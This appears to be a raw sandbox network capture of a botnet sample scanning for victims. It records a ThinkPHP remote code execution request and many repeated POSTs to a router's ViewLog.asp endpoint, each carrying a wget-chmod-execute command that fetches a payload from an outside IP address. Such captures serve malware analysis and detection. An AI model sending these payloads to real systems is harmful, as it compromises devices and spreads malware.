                                                            X-Content-Type-Options: nosniff
                                                            Date: Wed, 14 Feb 2024 08:28:33 GMT
                                                            Content-Length: 19
                                                            Connection: close
                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                            Data Ascii: 404 page not found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            329192.168.2.234906288.135.68.19380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:35.079547882 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:35.354195118 CET913INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 681
                                                            date: Wed, 14 Feb 2024 08:28:35 GMT
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            330192.168.2.235066694.120.1.938080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:35.268477917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            331192.168.2.235248494.122.87.898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:35.529613972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            332192.168.2.234623294.123.41.1678080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:35.529654980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            333192.168.2.233567694.122.204.2258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:35.529689074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            334192.168.2.235089695.75.64.1818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:35.803093910 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:36.080184937 CET412INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 09:23:13 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=180, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            335192.168.2.235295231.136.233.908080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:36.006603956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:36.702241898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:38.046060085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:40.893652916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:46.269269943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:57.019429922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.056160927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:03.058144093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            336192.168.2.234749031.136.70.808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:36.006844997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:36.702213049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:38.046047926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:40.893640041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:46.269068956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:57.019429922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.056168079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:03.058144093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            337192.168.2.235465695.217.212.2218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:36.009357929 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:36.234322071 CET184INHTTP/1.1 404 Not Found
                                                            Content-Encoding: gzip
                                                            Vary: Accept-Encoding
                                                            Date: Wed, 14 Feb 2024 08:28:36 GMT
                                                            Content-Length: 23
                                                            Connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            338192.168.2.235434294.123.68.1848080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:36.032402992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            339192.168.2.235880894.123.244.1478080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:36.034184933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            340192.168.2.235757694.60.143.418080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:36.256011963 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
